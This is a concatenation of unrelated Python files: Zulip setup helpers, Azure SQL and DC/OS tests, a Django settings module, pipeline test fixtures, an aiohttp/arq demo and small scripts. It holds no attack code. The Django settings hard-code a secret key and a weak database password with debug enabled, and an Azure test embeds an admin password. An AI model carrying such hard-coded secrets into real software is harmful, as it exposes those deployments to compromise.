'ID': 'ubuntu',
'VERSION_ID': '18.04',
'NAME': 'Ubuntu',
'VERSION': '18.04.3 LTS (Bionic Beaver)',
'PRETTY_NAME': 'Ubuntu 18.04.3 LTS',
}
VERSION_CODENAME (e.g. 'bionic') is nice and human-readable, but
we avoid using it, as it is not available on RHEL-based platforms.
"""
distro_info = {} # type: Dict[str, str]
with open('/etc/os-release') as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
# The line may be blank or a comment, see:
# https://www.freedesktop.org/software/systemd/man/os-release.html
continue
k, v = line.split('=', 1)
[distro_info[k]] = shlex.split(v)
return distro_info
@functools.lru_cache(None)
def os_families() -> Set[str]:
"""
Known families:
debian (includes: debian, ubuntu)
ubuntu (includes: ubuntu)
fedora (includes: fedora, rhel, centos)
rhel (includes: rhel, centos)
centos (includes: centos)
"""
distro_info = parse_os_release()
return {distro_info["ID"], *distro_info.get("ID_LIKE", "").split()}
def files_and_string_digest(filenames: Sequence[str],
extra_strings: Sequence[str]) -> str:
# see is_digest_obsolete for more context
sha1sum = hashlib.sha1()
for fn in filenames:
with open(fn, 'rb') as file_to_hash:
sha1sum.update(file_to_hash.read())
for extra_string in extra_strings:
sha1sum.update(extra_string.encode("utf-8"))
return sha1sum.hexdigest()
def is_digest_obsolete(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> bool:
'''
In order to determine if we need to run some
process, we calculate a digest of the important
files and strings whose respective contents
or values may indicate such a need.
filenames = files we should hash the contents of
extra_strings = strings we should hash directly
Grep for callers to see examples of how this is used.
To elaborate on extra_strings, they will typically
be things like:
- package versions (that we import)
- settings values (that we stringify with
json, deterministically)
'''
last_hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
try:
with open(last_hash_path) as f:
old_hash = f.read()
except FileNotFoundError:
# This is normal for a fresh checkout--a missing
# digest is an obsolete digest.
return True
new_hash = files_and_string_digest(filenames, extra_strings)
return new_hash != old_hash
def write_new_digest(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> None:
hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
new_hash = files_and_string_digest(filenames, extra_strings)
with open(hash_path, 'w') as f:
f.write(new_hash)
# Be a little verbose here--our callers ensure we
# only write new digests when things have changed, and
# making this system more transparent to developers
# can help them troubleshoot provisioning glitches.
print('New digest written to: ' + hash_path)
def is_root() -> bool:
if 'posix' in os.name and os.geteuid() == 0:
return True
return False
def run_as_root(args: List[str], **kwargs: Any) -> None:
sudo_args = kwargs.pop('sudo_args', [])
if not is_root():
args = ['sudo', *sudo_args, '--', *args]
run(args, **kwargs)
def assert_not_running_as_root() -> None:
script_name = os.path.abspath(sys.argv[0])
if is_root():
pwent = get_zulip_pwent()
msg = ("{shortname} should not be run as root. Use `su {user}` to switch to the 'zulip'\n"
"user before rerunning this, or use \n su {user} -c '{name} ...'\n"
"to switch users and run this as a single command.").format(
name=script_name,
shortname=os.path.basename(script_name),
user=pwent.pw_name)
print(msg)
sys.exit(1)
def assert_running_as_root(strip_lib_from_paths: bool=False) -> None:
script_name = os.path.abspath(sys.argv[0])
# Since these Python scripts are run inside a thin shell wrapper,
# we need to replace the paths in order to ensure we instruct
# users to (re)run the right command.
if strip_lib_from_paths:
script_name = script_name.replace("scripts/lib/upgrade", "scripts/upgrade")
if not is_root():
print("{} must be run as root.".format(script_name))
sys.exit(1)
def get_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
default_value: str = "",
) -> str:
if config_file.has_option(section, key):
return config_file.get(section, key)
return default_value
def set_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
value: str,
) -> None:
if not config_file.has_section(section):
config_file.add_section(section)
config_file.set(section, key, value)
def get_config_file() -> configparser.RawConfigParser:
config_file = configparser.RawConfigParser()
config_file.read("/etc/zulip/zulip.conf")
return config_file
def get_deploy_options(config_file: configparser.RawConfigParser) -> List[str]:
return get_config(config_file, 'deployment', 'deploy_options', "").strip().split()
def get_or_create_dev_uuid_var_path(path: str) -> str:
absolute_path = '{}/{}'.format(get_dev_uuid_var_path(), path)
os.makedirs(absolute_path, exist_ok=True)
return absolute_path
def is_vagrant_env_host(path: str) -> bool:
return '.vagrant' in os.listdir(path)
def deport(netloc: str) -> str:
"""Remove the port from a hostname:port string. Brackets on a literal
IPv6 address are included."""
r = SplitResult("", netloc, "", "", "")
assert r.hostname is not None
return "[" + r.hostname + "]" if ":" in r.hostname else r.hostname
if __name__ == '__main__':
cmd = sys.argv[1]
if cmd == 'make_deploy_path':
print(make_deploy_path())
elif cmd == 'get_dev_uuid':
print(get_dev_uuid_var_path())
|
# coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# Current Operation Coverage:
# ManagedInstances: 6/8
# ManagedInstanceOperations: 1/3
import unittest
import azure.mgmt.sql
from azure.core.exceptions import HttpResponseError
from devtools_testutils import AzureMgmtRecordedTestCase, RandomNameResourceGroupPreparer, ResourceGroupPreparer, recorded_by_proxy
AZURE_LOCATION = 'eastus'
class MgmtSqlTest(AzureMgmtRecordedTestCase):
def setup_method(self, method):
self.client = self.create_mgmt_client(
azure.mgmt.sql.SqlManagementClient
)
# self.mgmt_client180601 = self.create_mgmt_client(
# azure.mgmt.sql.SqlManagementClient,
# api_version="2018-06-01-preview"
# )
# if self.is_live:
# from azure.mgmt.network import NetworkManagementClient
# self.network_client = self.create_mgmt_client(
# NetworkManagementClient
# )
def create_virtual_network(self, group_name, location, security_group_name, route_table_name, network_name, subnet_name):
# Create network security group
network_security_group = self.network_client.network_security_groups.begin_create_or_update(
group_name,
security_group_name,
{
"location": location
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_tds_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "1433",
"priority": "1000"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_redirect_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "11000-11999",
"priority": "1100"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_inbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4096"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_outbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Outbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4095"
}
).result()
# Create route table
route_table = self.network_client.route_tables.begin_create_or_update(
group_name,
route_table_name,
{
"location": location
}
).result()
# create virtual network
azure_operation_poller = self.network_client.virtual_networks.begin_create_or_update(
group_name,
network_name,
{
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
}
},
)
result_create = azure_operation_poller.result()
# create subnet
async_subnet_creation = self.network_client.subnets.begin_create_or_update(
group_name,
network_name,
subnet_name,
{
'address_prefix': '10.0.0.0/24',
'network_security_group': network_security_group,
'route_table': route_table,
'delegations': [
{
"service_name": "Microsoft.Sql/managedInstances",
"name": "dgManagedInstancexxx"
}
]
}
)
subnet_info = async_subnet_creation.result()
return subnet_info
@recorded_by_proxy
def test_instance_operation(self):
RESOURCE_GROUP = "testManagedInstance"
MANAGED_INSTANCE_NAME = "testinstancexxy"
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/List the managed instance management operations[get]
#--------------------------------------------------------------------------
# result = self.client.managed_instance_operations.list_by_managed_instance(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = self.client.managed_instance_operations.list()
page_result = [item for item in result]
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/Gets the managed instance management operation[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/post/Cancel the managed instance management operation[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.cancel(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
@unittest.skip("it will take a long time.")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_managed_instances(self, resource_group):
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
VIRTUAL_NETWORK_NAME = "myVirtualNetwork"
SUBNET_NAME = "mysubnet"
NETWORK_SECURITY_GROUP = "mynetworksecuritygroup"
ROUTE_TABLE = "myroutetable"
MANAGED_INSTANCE_NAME = "mymanagedinstancexpnvcxxvx"
INSTANCE_POOL_NAME = "myinstancepool"
if self.is_live:
self.create_virtual_network(RESOURCE_GROUP, AZURE_LOCATION, NETWORK_SECURITY_GROUP, ROUTE_TABLE, VIRTUAL_NETWORK_NAME, SUBNET_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/put/Create managed instance with minimal properties[put]
#--------------------------------------------------------------------------
BODY = {
"sku": {
# "name": "BC_Gen5",
# "tier": "GeneralPurpose"
"name": "MIGP8G4",
"tier": "GeneralPurpose",
"family": "Gen5"
},
"location": "westeurope",
"administrator_login": "dummylogin",
"administrator_login_password": "Un53cuRE!",
"subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
"storage_account_type": "GRS",
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2",
# "license_type": "LicenseIncluded"
}
result = self.mgmt_client180601.managed_instances.begin_create_or_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# [Kaihui] it will use 6 hours to complete creation, so comment it.
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by instance pool[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list_by_instance_pool(resource_group_name=RESOURCE_GROUP, instance_pool_name=INSTANCE_POOL_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/Get managed instance[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by resource group[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list_by_resource_group(resource_group_name=RESOURCE_GROUP)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list()
#--------------------------------------------------------------------------
# /ManagedInstances/post/Failover a managed instance.[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.begin_failover(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, replica_type="Primary")
# result = result.result()
# #--------------------------------------------------------------------------
# # /ManagedInstances/patch/Update managed instance with minimal properties[patch]
# #--------------------------------------------------------------------------
# BODY = {
# "administrator_login": "dummylogin",
# "administrator_login_password": "Un53cuRE!",
# "subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2"
# }
# result = self.mgmt_client.managed_instances.begin_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/delete/Delete managed instance[delete]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.begin_delete(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = result.result()
|
import urllib.parse
import bs4
from retrying import retry
def test_if_dcos_ui_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
# Not sure if it's really needed, seems a bit of an overkill:
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
# Relative URLs only, others are to complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_if_mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
def test_if_exhibitor_api_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_exhibitor_ui_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_zookeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_dcos_history_service_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_marathon_ui_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_mesos_api_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_pkgpanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
assert len(data) > 5 # (prozlach) We can try to put minimal number of pacakages required
def test_if_dcos_history_service_is_getting_data(cluster):
@retry(stop_max_delay=20000, wait_fixed=500)
def check_up():
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert {'cluster', 'frameworks', 'slaves', 'hostname'} <= json.keys()
assert len(json["slaves"]) == len(cluster.all_slaves)
check_up()
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@2%a3gla^-3_x-7fxprr=@o=mafg(ac2%7drm9hbjj02xp&^@9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'board',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'board_rest',
'USER': 'postgres',
'PASSWORD': 'qwerty12345',
'HOST': 'localhost',
'PORT': '' # λΉμ΄λμΌλ©΄ default portλ‘ κ°κ²λλ€.,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 5,
}
|
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This test case is to test the speed of GDB when it is analyzing the
# function prologue.
from perftest import perftest
class SkipPrologue(perftest.TestCaseWithBasicMeasurements):
def __init__(self, count):
super(SkipPrologue, self).__init__("skip-prologue")
self.count = count
def _test(self):
for _ in range(1, self.count):
# Insert breakpoints on function f1 and f2.
bp1 = gdb.Breakpoint("f1")
bp2 = gdb.Breakpoint("f2")
# Remove them.
bp1.delete()
bp2.delete()
def warm_up(self):
self._test()
def execute_test(self):
for i in range(1, 4):
gdb.execute("set code-cache off")
gdb.execute("set code-cache on")
self.measure.measure(self._test, i)
|
import sys
import signal
from tempfile import gettempdir
from pathlib import Path
from shutil import rmtree
from multiprocessing import Process
import pytest
from pipen import Proc, Pipen, plugin
class SimpleProc(Proc):
"""A very simple process for testing"""
input = ["input"]
class NormalProc(Proc):
"""A normal proc"""
input = "input:var"
output = ["output:{{in.input}}"]
script = "echo {{in.input}}"
class In2Out1Proc(Proc):
"""Process with 2 input vars and 1 output var"""
input = "in1:var, in2:var"
output = "out:var:{{in.in1}}_{{in.in2}}"
script = "echo {{in.in1}} {{in.in2}}"
class RelPathScriptProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file://__init__.py"
class ScriptNotExistsProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file:///no/such/file"
class ErrorProc(Proc):
"""Errant process"""
input = ["input"]
script = "exit 1"
class ScriptRenderErrorProc(Proc):
"""When script is failed to render"""
input = "a"
output = "b:var:1"
script = "{{c(d)}}"
class SleepingProc(Proc):
"""Process to sleep for a certain time"""
input = "time"
script = "sleep {{in.time}}"
class RetryProc(ErrorProc):
input = "starttime"
error_strategy = "retry"
num_retries = 10
lang = sys.executable # python
script = "import sys, time; sys.exit(1 if time.time() < {{in.starttime}} + 3 else 0)"
class OutputRenderErrorProc(Proc):
"""When output is failed to render"""
input = "a"
output = "b:var:{{c(d)}}"
class OutputNoNameErrorProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b"
class OutputWrongTypeProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:c:d"
class OutputAbsPathProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:file:/a/b"
class NoInputProc(Proc):
"""Process without input"""
class InputTypeUnsupportedProc(Proc):
"""Input type not supported"""
input = "input:unsupported:1"
class FileInputProc(Proc):
"""Process with file input"""
input = "in:file"
output = "out:file:{{in.in.split('/')[-1]}}"
script = "cat {{in.in}} > {{out.out}}"
class OutputNotGeneratedProc(Proc):
"""Process with output file not generated intentionally"""
input = "in"
output = "out:file:{{in.in}}"
script = "echo {{in.in}}"
class FileInputsProc(Proc):
"""Process with files input"""
input = "in:files"
output = "out:file:{{in.in[0].split('/')[-1]}}"
script = "echo {{in.in}} > {{out.out}}"
class MixedInputProc(Proc):
"""Process with mixed types of input"""
input = "invar:var, infile:file"
output = "outfile:file:{{in.invar}}"
script = "echo {{in.invar}} > {{out.outfile}}"
class DirOutputProc(Proc):
"""Process with directory output"""
input = "in"
output = "outfile:dir:outdir"
script = "echo {{in.in}} > {{out.outfile}}/outfile; "
class SimplePlugin:
@plugin.impl
async def on_init(pipen):
print("SimplePlugin")
@pytest.fixture
def pipen(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def pipen_with_plugin(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
plugins=[SimplePlugin()],
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def infile(tmp_path):
out = tmp_path / "infile"
out.write_text("in")
return out
@pytest.fixture
def infile1(tmp_path):
out = tmp_path / "infile1"
out.write_text("in1")
return out
@pytest.fixture
def infile2(tmp_path):
out = tmp_path / "infile2"
out.write_text("in2")
return out
def create_dead_link(path):
target = Path(gettempdir()) / "__NoSuchFile__"
target.write_text("")
link = Path(path)
if link.exists() or link.is_symlink():
link.unlink()
link.symlink_to(target)
target.unlink()
|
# wordUse - count words in file and print top ten
import sys
def usage():
"""explain usage and exit"""
sys.exit("""wordUse - count words in file and print top ten
usage:
wordUse files""")
class wordCount:
"""Count number of uses of word."""
def __init__(self, word):
self.word = word
self.count = 0
def __cmp__(self,other):
return other.count - self.count
def wordUse(file):
"""Count words in file and print top ten"""
f = open(file)
dict = {}
while 1:
line = f.readline()
if line == '':
break
words = line.split()
for word in words:
if not dict.has_key(word):
wc = wordCount(word)
dict[word] = wc
else:
wc = dict[word]
wc.count += 1;
list = []
for key in dict.keys():
list.append(dict[key])
list.sort()
for i in range(10):
wc = list[i]
print "%s\t%d" % (wc.word, wc.count)
if (len(sys.argv) != 2):
usage()
wordUse(sys.argv[1])
|
#!/usr/bin/env python3.6
import os
import asyncio
from time import time
import chevron
import uvloop
from aiohttp import web, ClientError, ClientSession
from aiohttp_session import SimpleCookieStorage, get_session
from aiohttp_session import setup as session_setup
from arq import Actor, BaseWorker, RedisSettings, concurrent
R_OUTPUT = 'output'
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
class Downloader(Actor):
re_enqueue_jobs = True
async def startup(self):
self.session = ClientSession(loop=self.loop)
@concurrent
async def download_content(self, url, count):
total_size = 0
errors = []
start = time()
for _ in range(count):
try:
async with self.session.get(url) as r:
content = await r.read()
total_size += len(content)
if r.status != 200:
errors.append(f'{r.status} length: {len(content)}')
except ClientError as e:
errors.append(f'{e.__class__.__name__}: {e}')
output = f'{time() - start:0.2f}s, {count} downloads, total size: {total_size}'
if errors:
output += ', errors: ' + ', '.join(errors)
await self.redis.rpush(R_OUTPUT, output.encode())
return total_size
async def shutdown(self):
self.session.close()
html_template = """
<h1>arq demo</h1>
{{#message}}
<div>{{ message }}</div>
{{/message}}
<form method="post" action="/start-job/">
<p>
<label for="url">Url to download</label>
<input type="url" name="url" id="url" value="https://httpbin.org/get" required/>
</p>
<p>
<label for="count">Download count</label>
<input type="number" step="1" name="count" id="count" value="10" required/>
</p>
<p>
<input type="submit" value="Download"/>
</p>
</form>
<h2>Results:</h2>
{{#results}}
<p>{{ . }}</p>
{{/results}}
"""
async def index(request):
redis = await request.app['downloader'].get_redis()
data = await redis.lrange(R_OUTPUT, 0, -1)
results = [r.decode() for r in data]
session = await get_session(request)
html = chevron.render(html_template, {'message': session.get('message'), 'results': results})
session.invalidate()
return web.Response(text=html, content_type='text/html')
async def start_job(request):
data = await request.post()
session = await get_session(request)
try:
url = data['url']
count = int(data['count'])
except (KeyError, ValueError) as e:
session['message'] = f'Invalid input, {e.__class__.__name__}: {e}'
else:
await request.app['downloader'].download_content(url, count)
session['message'] = f'Downloading "{url}" ' + (f'{count} times.' if count > 1 else 'once.')
raise web.HTTPFound(location='/')
redis_settings = RedisSettings(host=os.getenv('REDIS_HOST', 'localhost'))
async def shutdown(app):
await app['downloader'].close()
def create_app():
app = web.Application()
app.router.add_get('/', index)
app.router.add_post('/start-job/', start_job)
app['downloader'] = Downloader(redis_settings=redis_settings)
app.on_shutdown.append(shutdown)
session_setup(app, SimpleCookieStorage())
return app
class Worker(BaseWorker):
# used by `arq app.py` command
shadows = [Downloader]
# set to small value so we can play with timeouts
timeout_seconds = 10
def __init__(self, *args, **kwargs):
kwargs['redis_settings'] = redis_settings
super().__init__(*args, **kwargs)
if __name__ == '__main__':
# when called directly run the webserver
app = create_app()
web.run_app(app, port=8000)
|
from .fem import DofMap, Q1Element
from .function_space import FunctionSpace
from .mesh import Mesh, ReferenceQuadrilateral
from .plot import plot
from .quadrature import Quadrature
from .assemble import assemble_vector, assemble_matrix, apply_bc
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright 2007 - 2014, Pascal Volk
# See COPYING for distribution information.
"""This is the vmm main script."""
import sys
if __name__ == "__main__":
# replace the script's cwd (/usr/local/sbin) with our module dir
# (the location of the vmm directory) - if it is not in sys.path
# sys.path[0] = '/usr/local/lib/vmm'
# Otherwise just remove /usr/local/sbin from sys.path
sys.path.remove(sys.path[0])
from vmm.cli.main import run
sys.exit(run(sys.argv))
|
"""Test initialization of the url factory classes"""
import unittest
from vizier.api.routes.base import UrlFactory
from vizier.api.routes.base import PROPERTIES_BASEURL, PROPERTIES_APIDOCURL
from vizier.api.routes.task import TaskUrlFactory
class TestUrlFactoryInit(unittest.TestCase):
def test_init_url_factory(self):
"""Test initializing the main url factory."""
urls = UrlFactory(base_url='http://abc.com/////')
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertIsNone(urls.api_doc_url)
urls = UrlFactory(base_url='http://abc.com/////', api_doc_url='ABC')
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertEqual(urls.api_doc_url, 'ABC')
# Override API doc url via properties
urls = UrlFactory(
base_url='http://abc.com/////',
api_doc_url='ABC',
properties={PROPERTIES_APIDOCURL: 'XYZ'}
)
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertEqual(urls.api_doc_url, 'XYZ')
# Override base url via properties
urls = UrlFactory(
base_url='http://abc.com/////',
api_doc_url='ABC',
properties={PROPERTIES_BASEURL: 'XYZ'}
)
self.assertEqual(urls.base_url, 'XYZ')
self.assertEqual(urls.api_doc_url, 'ABC')
# Initialize only via properties
urls = UrlFactory(properties={
PROPERTIES_BASEURL: 'XYZ',
PROPERTIES_APIDOCURL: 'ABC'
})
self.assertEqual(urls.base_url, 'XYZ')
self.assertEqual(urls.api_doc_url, 'ABC')
# Value error if base url is not set
with self.assertRaises(AssertionError):
urls = UrlFactory(
api_doc_url='ABC',
properties={PROPERTIES_APIDOCURL: 'XYZ'}
)
def test_tasks_url_factory(self):
"""Initialize the task url factory."""
fact = TaskUrlFactory(base_url='http://abc.com/////')
